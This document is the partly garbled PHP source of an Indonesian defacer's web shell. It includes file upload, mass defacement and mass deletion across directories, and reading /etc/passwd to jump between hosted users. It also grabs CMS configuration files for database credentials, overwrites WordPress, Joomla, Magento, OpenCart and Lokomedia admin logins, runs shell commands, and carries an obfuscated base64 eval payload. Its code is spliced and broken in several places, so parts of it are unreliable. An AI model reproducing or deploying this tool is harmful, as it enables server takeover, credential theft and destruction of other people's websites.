'.$dir.' | |||
'.$file.' |
window.location='?ketikung'"; } if($_GET['page'] == "blank") { echo "Back"; exit(); } if(isset($_REQUEST['logout'])) { session_destroy(); echo ""; } if(!($_SESSION['forbidden'])) { ?>
'; echo " | |||||||||
+ IP Kamu Syg | : ".$_SERVER['REMOTE_ADDR']."
+ IP Server | : ".gethostbyname($_SERVER['HTTP_HOST'])." |
+ system | : ".php_uname()." |
+ Coded By | : ./TN.GIIK1210 :) |
+ Message | : - I'AM DEFACER | |
path : ';
if(isset($_GET['path'])){
$path = $_GET['path'];
}else{
$path = getcwd();
}
$path = str_replace('\\','/',$path);
$paths = explode('/',$path);
foreach($paths as $id=>$pat){
if($pat == '' && $id == 0){
$a = true;
echo '/';
continue;
}
if($pat == '') continue;
echo ''.$pat.'/';
}
if(isset($_FILES['file'])){
if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){
echo 'UPLOADED SUCCES !!!!! '; }else{ echo ' '; } } echo ' |
'; echo " |
";
echo "Home";
echo "cp_reset_pw";
echo "Logout";
echo "Zone-h";
echo "Jumping";
echo "Symlink";
echo "Mass_deface";
echo "Mass_delete "; echo "Config_grab"; echo "auto_edit_user"; echo "End/Decode"; echo "Hash Generator"; echo "Adminer"; echo "Command"; echo "About"; echo ""; if($_GET['do'] == 'cmd') { echo' - Cpanel Reset Password '; ?> Gak Bisa Di Akses Onee Chan "; } else { echo " | |
';
}
elseif($_GET['logout'] == true) {
unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
echo "";
}
if($_GET['to'] == 'zoneh') {
if($_POST['submit']) {
$domain = explode("\r\n", $_POST['url']);
$nick = $_POST['nick'];
echo "Defacer Onhold: http://www.zone-h.org/archive/notifier=$nick/published=0 "; echo "Defacer Archive: http://www.zone-h.org/archive/notifier=$nick "; function zoneh($url,$nick) { $ch = curl_init("http://www.zone-h.com/notify/single"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send"); return curl_exec($ch); curl_close($ch); } foreach($domain as $url) { $zoneh = zoneh($url,$nick); if(preg_match("/color=\"red\">OK<\/font><\/li>/i", $zoneh)) { echo "$url -> OK "; } else { echo "$url -> ERROR "; } } } else { echo " "; file_put_contents($lokasi, $isi_script); $idx = sabun_massal($dirc,$namafile,$isi_script); } } } } } } function sabun_biasa($dir,$namafile,$isi_script) { if(is_writable($dir)) { $dira = scandir($dir); foreach($dira as $dirb) { $dirc = "$dir/$dirb"; $lokasi = $dirc.'/'.$namafile; if($dirb === '.') { file_put_contents($lokasi, $isi_script); } elseif($dirb === '..') { file_put_contents($lokasi, $isi_script); } else { if(is_dir($dirc)) { if(is_writable($dirc)) { echo "[DONE] $dirb/$namafile "; file_put_contents($lokasi, $isi_script); } } } } } } if($_POST['start']) { if($_POST['tipe_sabun'] == 'mahal') { echo " ";
sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
echo " ";
} elseif($_POST['tipe_sabun'] == 'murah') {
echo "";
sabun_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
echo " ";
}
} else {
echo "'; eval(gzinflate(base64_decode('7Vf/T9tGFP89Uv6H1yOT7ZHaSRBrReKUrjCt0lakAtskqCLHPmOPi8+6u2BSyv++d+fYpE4AlVbaJhWJyHnf/b583ksnnjMGPkglJoLmLAip3ZkcH77/4/D9mXVw9Ob098N3J5P3R0cn1ocuENKFTh6oxBm2W52oNwvSTKL6fpwyahOPqtDLghmN3JBnMdFSW1uJUmhWtltpbFc6zk27tT+7jFJhk4iGwWIiFzPS7b148UIr7YdJg2Wo9JqGNmEZPJfggeBcGXpHe9/BMKyjXKUcI3qbRSgr4RfOGC+OF7Pf0uwSIzhIBQ0VFwsjAMa8m6hZu/U6ik4WOQVFr5WHeUgzcPMkB8P5NcgiRkWT2W4dByqV8QJeZwvLBJLrMGKe08y20HAQ4otLq2sVVhloYfiFSBXmGaW7ZezOcD8OGZclUYvSMOFA2q2RCqaMQsDSi8wPaaYwjCkXERX+DlZtwahvFWmkkr2fej8MS87zkDMu9rZe/tzDv6E11maE+Yw+szQexTxTYMR9ls4oyPQj9QfjYxfecXfkafZ45KnoS5QPuCnxE7VPJRVP1cVCMyx0Q9vDdyemX0M+Rz0f+vgt5oIGYVJ3JAQSls+6ObFXqaAXqU0+8oySbsVybnIkT2aBCpNJwJhtbWkBILb7o0O2rG5lRD+UidDljNlcJrZ+QsM4bAwbRIl0ZldCZ/0PZ70PjgNjGGj/nTnmAUPNuUyvJxdU5cU8jWwzaLzIqFhO2xUmJpBUesRtmqq7CIvfyB8mpszhMnEEXKjS46LCPelnNEZqAImgsY9jne95XlEUbtO3S7yqRiyQ0lfXarwuU3sJVjxpOf3qZ5bGEcuI1bzKtdXRsOXV6OBpKPASPqPemrqXz6csDSc45cwCFQjMpW9NpizILq21KJsdtAxt2UOwWshlvra3h7e3t3WqPTOvpt9uKZNUl/Lk8PjELyHSMkXL0V0RWWU7gG0EnoSI/3VAhMcQER6AROQ2UREqWIQHcLE/LtEO7sEN0/M7GzHuEZUN2PSYk3VEqvEIPgckMO9dJ4usdApuXSKIA1wAvU6VTU4z8/aKg5YFrfjMVB6KRLfZs5hyXLaa7ujGgo7e0jG2vlxSjUODYlSzAiGChV1SdUB3IIcte+4huL1yzvfOPU9qhJPdWrdpaPWQIOVEdvFqqCRw9o3GHQrWhhD5+gP49AnWGL4PPc24c+MDmaYZWSPqlP3V73uxXOddBcJj6dTL7mMGIi80aTP3gucJFes8uTEQYy+arTPmEk0hNN0TQ6zyzW+VbWJoDcTfzQxzhxEHk423mEqzOb0bID0gDzXuho3wYLevwLzWq0KpFMmq50cMVBj/AMQ3XKwi/BrA1wMY3DN9Gr9rlKkmownmJZTr+5VLeIYJ/jPNIl5I4tzci9mbEFtfsGt4fYfW6PkLAbvXe/kNoLrd+mqwfgCpq0Ing2WZrcsBYzs70aAuDxxTcUXFyEsG428C7m8P/lVgV3SWY6IIGXbwQOvjY888DTTW65schfAAtZfskQ+GW37d3nbgpoPXnv5h1bj/jMASQfFwQJJTOnN9+JunWLY9q2vILjnPsHGrSlijqfDG1rAKrTw+9ZdlA+4i0URllo+iUrk4jgjeRblY4nxeLY/d7lJRk1dGZxdNray0ap9tsvpV+2x9mX2bTfZ9jX1fY//nNdYYxw2bbORF6RV+LoMmw3mmza5MplG6Bb3v4E59EwK+CbKM4yvjz2hFoYmHtQdtrvx/Nf4H'))); } elseif($_GET['to'] == 'jumping') { $i = 0; echo " ";
if(preg_match("/hsphere/", $dir)) {
$urls = explode("\r\n", $_POST['url']);
if(isset($_POST['jump'])) {
echo " ";
} //MASS DELETE/////////////////////////
elseif($_GET['to'] == 'masse') {
function hapus_massal($dir,$namafile) {
if(is_writable($dir)) {
$dira = scandir($dir);
foreach($dira as $dirb) {
$dirc = "$dir/$dirb";
$lokasi = $dirc.'/'.$namafile;
if($dirb === '.') {
if(file_exists("$dir/$namafile")) {
unlink("$dir/$namafile");
}
} elseif($dirb === '..') {
if(file_exists("".dirname($dir)."/$namafile")) {
unlink("".dirname($dir)."/$namafile");
}
} else {
if(is_dir($dirc)) {
if(is_writable($dirc)) {
if(file_exists($lokasi)) {
echo "[Terhapus] $lokasi"; foreach($urls as $url) { $url = str_replace(array("http://","www."), "", strtolower($url)); $etc = "/etc/passwd"; $f = fopen($etc,"r"); while($gets = fgets($f)) { $pecah = explode(":", $gets); $user = $pecah[0]; $dir_user = "/hsphere/local/home/$user"; if(is_dir($dir_user) === true) { $url_user = $dir_user."/".$url; if(is_readable($url_user)) { $i++; $jrw = "[R] $url_user"; if(is_writable($url_user)) { $jrw = "[RW] $url_user"; } echo $jrw.""; } else { echo ' "; foreach($urls as $url) { $url = str_replace("www.", "", $url); $web_vh = "/var/www/".$vh[1]."/$url/httpdocs"; if(is_dir($web_vh) === true) { if(is_readable($web_vh)) { $i++; $jrw = "[R] $web_vh"; if(is_writable($web_vh)) { $jrw = "[RW] $web_vh"; } echo $jrw.""; } else { echo ' "; $etc = fopen("/etc/passwd", "r") or die("Can't read /etc/passwd"); while($passwd = fgets($etc)) { if($passwd == '' || !$etc) { echo "Can't read /etc/passwd"; } else { preg_match_all('/(.*?):x:/', $passwd, $user_jumping); foreach($user_jumping[1] as $user_idx_jump) { $user_jumping_dir = "/home/$user_idx_jump/public_html"; if(is_readable($user_jumping_dir)) { $i++; $jrw = "[R] $user_jumping_dir"; if(is_writable($user_jumping_dir)) { $jrw = "[RW] $user_jumping_dir"; } echo $jrw; if(function_exists('posix_getpwuid')) { $domain_jump = file_get_contents("/etc/named.conf"); if($domain_jump == '') { echo " => ( gabisa ambil nama domain nya )"; } echo " "; unlink($lokasi); $idx = hapus_massal($dirc,$namafile); } } } } } } } if($_POST['start']) { echo " ";
hapus_massal($_POST['d_dir'], $_POST['d_file']);
echo " ";
} else {
echo "Can't read /etc/passwd"); $idx = mkdir("./SimonXporn66Xploit_CONFIG", 0777); $isi_htc = "Options all\nRequire None\nSatisfy Any"; $htc = fopen("./SimonXporn66Xploit_CONFIG/.htaccess","w"); fwrite($htc, $isi_htc); while($passwd = fgets($etc)) { if($passwd == "" || !$etc) { echo "Can't read /etc/passwd"; } else { preg_match_all('/(.*?):x:/', $passwd, $user_config); foreach($user_config[1] as $user_3X0RC1ST) { $user_config_dir = "/home/$user_./SimonXporn66Xploit/public_html/"; if(is_readable($user_config_dir)) { $grab_config = array( "/home/$user_./SimonXporn66Xploit/.my.cnf" => "cpanel", "/home/$user_./SimonXporn66Xploit/.accesshash" => "WHM-accesshash", "/home/$user_./SimonXporn66Xploit/public_html/vdo_config.php" => "Voodoo", "/home/$user_./SimonXporn66Xploit/public_html/bw-configs/config.ini" => "BosWeb", "/home/$user_./SimonXporn66Xploit/public_html/config/koneksi.php" => "Lokomedia", "/home/$user_./SimonXporn66Xploit/public_html/lokomedia/config/koneksi.php" => "Lokomedia", "/home/$user_./SimonXporn66Xploit/public_html/clientarea/configuration.php" => "WHMCS", "/home/$user_./SimonXporn66Xploit/public_html/whm/configuration.php" => "WHMCS", "/home/$user_./SimonXporn66Xploit/public_html/whmcs/configuration.php" => "WHMCS", "/home/$user_./SimonXporn66Xploit/public_html/forum/config.php" => "phpBB", "/home/$user_./SimonXporn66Xploit/public_html/sites/default/settings.php" => "Drupal", "/home/$user_./SimonXporn66Xploit/public_html/config/settings.inc.php" => "PrestaShop", "/home/$user_./SimonXporn66Xploit/public_html/app/etc/local.xml" => "Magento", "/home/$user_./SimonXporn66Xploit/public_html/joomla/configuration.php" => "Joomla", "/home/$user_./SimonXporn66Xploit/public_html/configuration.php" => "Joomla", "/home/$user_./SimonXporn66Xploit/public_html/wp/wp-config.php" => "WordPress", "/home/$user_./SimonXporn66Xploit/public_html/wordpress/wp-config.php" => "WordPress", "/home/$user_./SimonXporn66Xploit/public_html/wp-config.php" => "WordPress", "/home/$user_./SimonXporn66Xploit/public_html/admin/config.php" => "OpenCart", "/home/$user_./SimonXporn66Xploit/public_html/slconfig.php" => "Sitelok", "/home/$user_./SimonXporn66Xploit/public_html/application/config/database.php" => "Ellislab"); foreach($grab_config as $config => $nama_config) { $ambil_config = file_get_contents($config); if($ambil_config == '') { } else { $file_config = fopen("3X0RC1ST_CONFIG/$user_jefri-$nama_config.txt","w"); fputs($file_config,$ambil_config); } } } } } } echo " "; echo "CMS => Joomla "; if($site == '') { echo "Sitename => error, gabisa ambil nama domain nya "; } else { echo "Sitename => $site "; } if(!$update OR !$conn OR !$db) { echo "Status => ".mysql_error()." "; } else { echo "Status => sukses edit user, silakan login dengan user & pass yang baru. "; } mysql_close($conn); } elseif(preg_match("/WordPress/",$config)) { $dbhost = ambilkata($config,"DB_HOST', '","'"); $dbuser = ambilkata($config,"DB_USER', '","'"); $dbpass = ambilkata($config,"DB_PASSWORD', '","'"); $dbname = ambilkata($config,"DB_NAME', '","'"); $dbprefix = ambilkata($config,"table_prefix = '","'"); $prefix = $dbprefix."users"; $option = $dbprefix."options"; $conn = mysql_connect($dbhost,$dbuser,$dbpass); $db = mysql_select_db($dbname); $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC"); $result = mysql_fetch_array($q); $id = $result[ID]; $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC"); $result2 = mysql_fetch_array($q2); $target = $result2[option_value]; if($target == '') { $url_target = "Login => error, gabisa ambil nama domain nyaa "; } else { $url_target = "Login => $target/wp-login.php "; } $update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'"); echo "Config => ".$file_conf." "; echo "CMS => Wordpress "; echo $url_target; if(!$update OR !$conn OR !$db) { echo "Status => ".mysql_error()." "; } else { echo "Status => sukses edit user, silakan login dengan user & pass yang baru. "; } mysql_close($conn); } elseif(preg_match("/Magento|Mage_Core/",$config)) { $dbhost = ambilkata($config," "; } else { $url_target = "Login => $target/admin/ "; } $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'"); echo "Config => ".$file_conf." "; echo "CMS => Magento "; echo $url_target; if(!$update OR !$conn OR !$db) { echo "Status => ".mysql_error()." "; } else { echo "Status => sukses edit user, silakan login dengan user & pass yang baru. "; } mysql_close($conn); } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) { $dbhost = ambilkata($config,"'DB_HOSTNAME', '","'"); $dbuser = ambilkata($config,"'DB_USERNAME', '","'"); $dbpass = ambilkata($config,"'DB_PASSWORD', '","'"); $dbname = ambilkata($config,"'DB_DATABASE', '","'"); $dbprefix = ambilkata($config,"'DB_PREFIX', '","'"); $prefix = $dbprefix."user"; $conn = mysql_connect($dbhost,$dbuser,$dbpass); $db = mysql_select_db($dbname); $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC"); $result = mysql_fetch_array($q); $id = $result[user_id]; $target = ambilkata($config,"HTTP_SERVER', '","'"); if($target == '') { $url_target = "Login => error, gabisa ambil nama domain nyaa "; } else { $url_target = "Login => $target "; } $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'"); echo "Config => ".$file_conf." "; echo "CMS => OpenCart "; echo $url_target; if(!$update OR !$conn OR !$db) { echo "Status => ".mysql_error()." "; } else { echo "Status => sukses edit user, silakan login dengan user & pass yang baru. "; } mysql_close($conn); } elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) { $dbhost = ambilkata($config,'server = "','"'); $dbuser = ambilkata($config,'username = "','"'); $dbpass = ambilkata($config,'password = "','"'); $dbname = ambilkata($config,'database = "','"'); $prefix = "users"; $option = "identitas"; $conn = mysql_connect($dbhost,$dbuser,$dbpass); $db = mysql_select_db($dbname); $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC"); $result = mysql_fetch_array($q); $target = $result[alamat_website]; if($target == '') { $target2 = $result[url]; $url_target = "Login => error, gabisa ambil nama domain nyaa "; if($target2 == '') { $url_target2 = "Login => error, gabisa ambil nama domain nyaa "; } else { $cek_login3 = file_get_contents("$target2/adminweb/"); $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/"); if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) { $url_target2 = "Login => $target2/adminweb "; } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) { $url_target2 = "Login => $target2/lokomedia/adminweb "; } else { $url_target2 = "Login => $target2 [ gatau admin login nya dimana :p ] "; } } } else { $cek_login = file_get_contents("$target/adminweb/"); $cek_login2 = file_get_contents("$target/lokomedia/adminweb/"); if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) { $url_target = "Login => $target/adminweb "; } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) { $url_target = "Login => $target/lokomedia/adminweb "; } else { $url_target = "Login => $target [ gatau admin login nya dimana :p ] "; } } $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'"); echo "Config => ".$file_conf." "; echo "CMS => Lokomedia "; if(preg_match('/error, gabisa ambil nama domain nya/', $url_target)) { echo $url_target2; } else { echo $url_target; } if(!$update OR !$conn OR !$db) { echo "Status => ".mysql_error()." "; } else { echo "Status => sukses edit user, silakan login dengan user & pass yang baru. "; } mysql_close($conn); } } } } else { echo " Auto Edit User ConfigNB: Tools ini work jika dijalankan di dalam folder config ( ex: /home/user/public_html/nama_folder_config )"; } } elseif($_GET['do'] == 'endec') { @ini_set('output_buffering',0); @ini_set('display_errors', 0); $text = $_POST['code']; ?> Encode And Decode"; } elseif($_GET['do'] == 'hashgen') { $submit = $_POST['enter']; if (isset($submit)) { $pass = $_POST['password']; // password $salt = '}#f4ga~g%7hjg4&j(7mk?/!bj30ab-wi=6^7-$^R9F|GK5J#E6WT;IO[JN'; // random string $hash = md5($pass); // md5 hash #1 $md4 = hash("md4", $pass); $hash_md5 = md5($salt . $pass); // md5 hash with salt #2 $hash_md5_double = md5(sha1($salt . $pass)); // md5 hash with salt & sha1 #3 $hash1 = sha1($pass); // sha1 hash #4 $sha256 = hash("sha256", $text); $hash1_sha1 = sha1($salt . $pass); // sha1 hash with salt #5 $hash1_sha1_double = sha1(md5($salt . $pass)); // sha1 hash with salt & md5 #6 } echo '"; if($_POST['do_cmd']) { echo " ".exe($_POST['cmd']).""; } } if(isset($_GET['filesrc'])){ echo " Current File : ";
echo $_GET['filesrc'];
echo ' | |
'.$dir.' | |||
'.$file.' |